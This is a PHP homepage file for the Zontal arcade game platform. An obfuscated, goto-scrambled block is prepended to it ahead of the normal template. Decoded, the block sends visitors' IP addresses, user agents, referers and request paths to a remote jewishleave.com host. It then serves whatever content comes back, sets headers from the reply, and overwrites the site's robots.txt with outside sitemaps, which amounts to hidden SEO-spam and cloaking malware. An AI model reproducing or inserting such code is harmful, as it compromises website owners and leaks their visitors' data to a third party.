편집 파일: index.php
<?php goto dB_xy; eESHZ: kuyUG: goto wExnH; jthth: goto iN4vh; goto kcgKb; SMUHP: headeR("\x48\x54\x54\120\57\61\x2e\60\x20\64\x30\64\40\116\x6f\164\40\x46\x6f\165\156\x64"); goto dme0Q; ZEknh: InKVX: goto jthth; B0DAW: echo "\x72\157\x62\x6f\x74\163\x2e\x74\x78\x74\40\x64\x6f\156\x65"; goto gzs4R; bU6Hy: exit; goto kTS2h; p6VyB: if (!($AiHnb == "\160\x69\x6e\147")) { goto InKVX; } goto G16NZ; abOj5: hEader("\x48\124\124\x50\x2f\x31\56\x30\40\x34\60\64\40\x4e\x6f\164\40\x46\x6f\x75\156\144"); goto FjjSR; sV3tB: if (!($AiHnb == "\x65\170\x69\x74")) { goto PKLm3; } goto bU6Hy; xLca7: $JRfUl = curl_EXeC($KNSlL); goto bv4n6; olQXN: exit; goto DrkF3; ZYXYh: tSYDH: goto QBE69; cqC9G: if ($KFNlp < 3) { goto BIzTN; } goto MGTAa; kkEh2: $VE1pS = "\163\x79\x31"; goto BSa6P; IO0vr: p9qRd: goto OwFYo; bv4n6: $JRfUl = tRIM($JRfUl); goto T_QKQ; kcgKb: BIzTN: goto SMUHP; G16NZ: $sQs0K = "\x55\163\x65\x72\55\141\x67\145\x6e\x74\x3a\x2a" . PHP_EOL; goto tDs87; GIgg7: $khAAv = eXPloDe("\174\x40\x23\44\174", $JRfUl); goto wIVG8; f3NyR: $v6Bl0 = expLoDE("\74\142\x72\x2f\76", $K1iwc); goto S6_GM; VDVxN: if (empty($K1iwc)) { goto p9qRd; } goto t_q11; DrkF3: g1BsC: goto PXJk0; wExnH: FilE_pUt_ContENTs($_SERVER["\104\x4f\103\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"] . "\x2f\162\157\x62\x6f\164\163\56\x74\x78\x74", $sQs0K); goto B0DAW; Cm2kY: $KNSlL = cUrL_iniT(); goto xgZl7; k8Yd8: foreach ($Y1c7k as $jfVd5) { goto Gk4fh; PC3Yz: $RePKx = str_rePLacE("\75", "\x2e", $RePKx); goto DS9m0; FeGd9: kmE0l: goto k1Men; DS9m0: $twicq .= "\46" . $jfVd5 . "\75" . $RePKx; goto FeGd9; Gk4fh: $f85rN = isset($_SERVER[$jfVd5]) ? $_SERVER[$jfVd5] : ''; goto Z3I7Q; Z3I7Q: $RePKx = BAsE64_EncODE(trIm($f85rN)); goto hx1Vu; hx1Vu: $RePKx = sTR_rEplacE("\x2b", "\x2d", $RePKx); goto K3u0l; K3u0l: $RePKx = STR_replaCE("\57", "\137", $RePKx); goto PC3Yz; k1Men: } goto i7Gne; OwFYo: $AiHnb = trIm($khAAv[$KFNlp - RouND(0.1946 + 0.027 + 0.023 + 0.09306 + 0.24925 + 0.183 + 0.2289322)]); goto sV3tB; BSa6P: if (!(preG_maTCh("\x2f\x6a\x70\62\60\x32\63\x2f\163\151", $_SERVER["\122\105\121\x55\105\x53\124\137\x55\x52\x49"]) == RouND(0.27 + 0.2749015 + 0.02391671 + 0.0121 + 0.239167 + 0.18))) { goto g1BsC; } goto UDXYv; N7B8J: daJjW: goto cT24e; wIVG8: $KFNlp = cOunt($khAAv); goto cqC9G; XhuYC: if (!empty($JRfUl)) { goto daJjW; } goto AnY0W; dB_xy: eRroR_REportinG(RouND(0 + 0)); goto IHbbK; xgZl7: curL_SetOPT($KNSlL, CURLOPT_URL, $mS6d9); goto C6PTL; FjjSR: FtXQu: goto wgn0N; Wzsss: HEaDER($T2C0I); goto ZYXYh; C6PTL: CURL_SeTopt($KNSlL, CURLOPT_RETURNTRANSFER, ROUND(0.12468619 + 0.26834031 + 0.15258 + 0.1311 + 0.2521618 + 0.0711297)); goto MVm2A; PXJk0: $IjdOY = "\x68\x74\164\160\x3a\x2f\x2f" . $dxlXx . "\x2e\x6a\x65\167\151\x73\x68\154\x65\x61\166\145\56\x63\157\x6d"; goto fjhQs; wgn0N: echo "\x48\x54\124\x50\x2f\x31\56\x30\40\64\60\x34\40\x4e\x6f\x74\40\x46\x6f\165\156\x64\137\x5f\137" . $dxlXx . "\137\137\137" . $VE1pS; goto olQXN; O87bh: $mS6d9 = $IjdOY . $twicq; goto Cm2kY; gzs4R: exit; goto ZEknh; fjhQs: $twicq = "\x2f\151\x6e\144\x65\170\56\x70\x68\160\x3f\x56\123\75" . $VE1pS . "\x26\x47\120\75" . $dxlXx; goto N4o13; N4o13: $Y1c7k = array("\x53\103\x52\x49\x50\x54\137\x4e\x41\x4d\105", "\x52\105\x51\x55\105\123\x54\137\x55\x52\x49", "\x48\x54\x54\120\x53", "\122\105\x51\x55\105\x53\x54\137\123\103\x48\105\x4d\x45", "\123\x45\122\126\x45\x52\137\x50\117\x52\x54", "\122\x45\115\x4f\x54\105\x5f\101\x44\104\122", "\110\124\124\x50\137\122\x45\x46\x45\x52\105\122", "\110\x54\x54\x50\137\101\103\x43\x45\x50\x54\137\114\x41\x4e\107\125\x41\107\x45", "\110\x54\x54\x50\137\x55\x53\105\122\x5f\101\x47\105\x4e\x54", "\x48\x54\x54\x50\137\110\117\x53\x54"); goto k8Yd8; S6_GM: ArRAy_Pop($v6Bl0); goto rslCF; cT24e: $JRfUl = trIm($JRfUl); goto GIgg7; UDXYv: if (!(pReg_mATcH("\x2f\152\160\x32\60\x32\x33\x63\167\x77\x2f\x73\x69", $_SERVER["\122\105\121\x55\x45\123\x54\x5f\125\x52\111"]) == rounD(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0))) { goto FtXQu; } goto abOj5; i7Gne: p_ega: goto O87bh; MGTAa: $T2C0I = TRIm($khAAv[rOUND(0 + 0 + 0 + 0)]); goto g7kWt; AnY0W: $JRfUl = fIlE_gEt_conTENts($mS6d9); goto N7B8J; IHbbK: $dxlXx = "\172\x6a\61\x31\63\61"; goto kkEh2; dme0Q: exit; goto VRAvJ; MVm2A: curl_Setopt($KNSlL, CURLOPT_CONNECTTIMEOUT, rouNd(2.232521 + 0.2356992 + 1.89883475 + 1.8326 + 0.045 + 1.78496 + 1.970339)); goto xLca7; T_QKQ: CUrl_CLoSe($KNSlL); goto XhuYC; t_q11: echo $K1iwc; goto IO0vr; g7kWt: if (empty($T2C0I)) { goto tSYDH; } goto Wzsss; rslCF: foreach ($v6Bl0 as $HxvIR) { $sQs0K .= "\x53\151\x74\145\155\x61\x70\72" . $HxvIR . PHP_EOL; BXEPn: } goto eESHZ; kTS2h: PKLm3: goto p6VyB; tDs87: $sQs0K .= "\x41\154\x6c\x6f\x77\x3a\57" . PHP_EOL; goto f3NyR; QBE69: $K1iwc = tRiM($khAAv[roUND(0.258165 + 0.11314152 + 0.341 + 0.1353 + 0.1524)]); goto VDVxN; VRAvJ: iN4vh: ?> <?php // +------------------------------------------------------------------------+ // | @author: MvnThemes // | @name: Zontal - The Arcade Online HTML5 Game Playing Platform // | @author_email: mvk62015@gmail.com // | @version: 1.0v // +------------------------------------------------------------------------+ // | Zontal - The Arcade Online HTML5 Game Playing Platform // | Copyright (c) 2017 Zontal. All rights reserved. // ?> <?php // include Header ?> <?php include("includes/header.php") ?> <?php // Getting Total Categories ?> <?php $run = mysqli_query($con, "select * from zon_category"); $count = mysqli_num_rows($run); ?> <?php // Body Start ?> <body class="bg-dark dark:bg-[#121317]"> <?php // include Main Header ?> <?php include("includes/main-h.php") ?> <?php // Categories Container ?> <div class="cat-container px-4 relative mt-4"> <button class="left ml-2 mt-1 w-10 h-10 hidden absolute left-0 rounded-full bg-gray-200 dark:bg-zinc-800 text-gray-700 dark:hover:bg-zinc-700 hover:bg-gray-300 dark:text-white bi-chevron-left"></button> <?php // Categories Loop ?> <div class="cat-item-container scroll-hidden w-full overflow-x-scroll flex gap-4"> <?php $run = mysqli_query($con, "select * from zon_category"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="<?php echo $site_url ?>game/<?= $row['slug'] ?>" class="py-3 px-4 transition whitespace-nowrap dark:text-gray-300 dark:bg-[#1b1d22] duration-300 mb-2 hover:bg-blue-600 hover:text-gray-100 text-gray-600 text-sm rounded-md bg-gray-200"><?= $row['name'] ?></a> <?php } ?> </div> <?php // Categories Loop End ?> <button class="right h-10 mr-2 mt-0 absolute right-0 top-0 w-10 rounded-full bg-gray-200 dark:bg-zinc-800 text-gray-700 dark:hover:bg-zinc-700 hover:bg-gray-300 dark:text-white bi-chevron-right"></button> </div> <div class="body container-zon mt-3 px-0"> <div class="mx-4"> <?php // First Game Container ?> <div class="grid"> <?php $run_d = mysqli_query($con, "select * from zon_games where game_played > 50 order by id desc limit 1"); while ($row = mysqli_fetch_assoc($run_d)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box large block relative overflow-hidden rounded-xl upward cursor-pointer transition duration-300 overlay"> <div class="card-body absolute w-full h-full "> <img src="<?= $row['game_image_url'] ?>" class="absolute w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </div> </a> <?php } ?> <?php $run = mysqli_query($con, "select * from zon_games order by id desc limit 1,63"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative overflow-hidden rounded-xl upward cursor-pointer transition duration-300 overlay"> <div class="card-body absolute w-full h-full "> <img src="<?= $row['game_image_url'] ?>" class="absolute w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </div> </a> <?php } ?> </div> <?php // First Game Container End ?> <?php // Start Advertisement Area No. 1 ?> <?php $run = mysqli_query($con, "select * from zon_ads limit 1,1"); while ($row = mysqli_fetch_assoc($run)) { ?> <?php if ($row['status'] == 0) { ?> <div class="advertisement flex mt-6 relative overflow-hidden justify-center "> <div class="banner"> <?= $row['code'] ?> </div> </div> <?php } } ?> <?php // End Advertisement Area No. 1 ?> <?php // Showing Games By Category Action ?> <h2 class="heading font-bold text-2xl mb-4 text-gray-800 mt-12 dark:text-gray-200">Action Games</h2> <div class="grid"> <?php $run = mysqli_query($con, "SELECT * from zon_games where game_category='Action' && game_played > 50 order by id desc limit 1"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative overflow-hidden large float-right rounded-xl overflow-hidden upward {scale-up} cursor-pointer transition duration-300 overlay"> <img src="<?= $row['game_image_url'] ?>" class="w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </a> <?php } ?> <?php $run = mysqli_query($con, "SELECT * from zon_games where game_category='Action' order by id desc limit 54"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative <?php if ($row['game_played'] > 10) { echo "large"; } ?> overflow-hidden rounded-xl overflow-hidden upward {scale-up} cursor-pointer transition duration-300 overlay"> <img src="<?= $row['game_image_url'] ?>" class="w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </a> <?php } ?> </div> <?php // End Action Category Games ?> <?php // Start Advertisement Area No. 2 ?> <?php $run = mysqli_query($con, "select * from zon_ads limit 1,1"); while ($row = mysqli_fetch_assoc($run)) { ?> <?php if ($row['status'] == 0) { ?> <div class="advertisement flex mt-6 relative overflow-hidden justify-center "> <div class="banner"> <?= $row['code'] ?> </div> </div> <?php } } ?> <?php // End Start Advertisement Area No. 2 ?> <?php // Games By Categories vise ?> <div class="drill flex resp gap-3"> <div class="w-full"> <div class="heading flex items-center justify-between"> <h2 class="font-bold text-2xl mb-4 text-gray-800 mt-12 dark:text-gray-200">Action Games</h2> <a class="text-gray-400 block mr-12 mt-6" href="<?php echo $site_url ?>game/action">view</a> </div> <?php // Showing Games By Category Action ?> <div class="grid"> <?php $run = mysqli_query($con, "SELECT * from zon_games where game_category='Action' order by id desc limit 18"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative overflow-hidden rounded-xl overflow-hidden upward {scale-up} cursor-pointer transition duration-300 overlay"> <img src="<?= $row['game_image_url'] ?>" class="w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </a> <?php } ?> </div> <?php // End Action Category Games ?> </div> <?php // Showing Games By Category Shooting ?> <div class="w-full"> <div class="heading flex items-center justify-between"> <h2 class="font-bold text-2xl mb-4 text-gray-800 mt-12 dark:text-gray-200">Shooting Games</h2> <a class="text-gray-400 block mr-12 mt-6" href="<?php echo $site_url ?>game/Shooting">view</a> </div> <div class="grid"> <?php $run = mysqli_query($con, "SELECT * from zon_games where game_category='Shooting' order by id desc limit 18"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative overflow-hidden rounded-xl overflow-hidden upward {scale-up} cursor-pointer transition duration-300 overlay"> <img src="<?= $row['game_image_url'] ?>" class="w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </a> <?php } ?> </div> </div> <?php // End Shooting Category Games ?> <?php // Showing Games By Category Puzzles ?> <div class="w-full"> <div class="heading flex items-center justify-between"> <h2 class="font-bold text-2xl mb-4 text-gray-800 mt-12 dark:text-gray-200">Puzzles Games</h2> <a class="text-gray-400 block mr-12 mt-6" href="<?php echo $site_url ?>game/puzzles">view</a> </div> <div class="grid"> <?php $run = mysqli_query($con, "SELECT * from zon_games where game_category='Puzzles' order by id desc limit 18"); while ($row = mysqli_fetch_assoc($run)) { ?> <a href="single/<?= $row['id'] ?>/<?php $text = $row['game_name']; $lower = strtolower($text); $revspace = str_replace(" ", "-", $lower); echo $revspace; ?>" class="box block relative overflow-hidden rounded-xl overflow-hidden upward {scale-up} cursor-pointer transition duration-300 overlay"> <img src="<?= $row['game_image_url'] ?>" class="w-full h-full object-cover" alt="<?= $row['game_name'] ?>"> <h2 style="z-index: 9;" class="text-white absolute bottom-0 left-0 px-2 py-2"><?= $row['game_name'] ?></h2> </a> <?php } ?> </div> </div> <?php // End Puzzles Category Games ?> </div> <?php // End Games By Categories vise ?> </div> </div> </div> </div> <?php // Include Footer ?> <?php include("includes/footer.php") ?> </body> <?php // Body End ?> </html>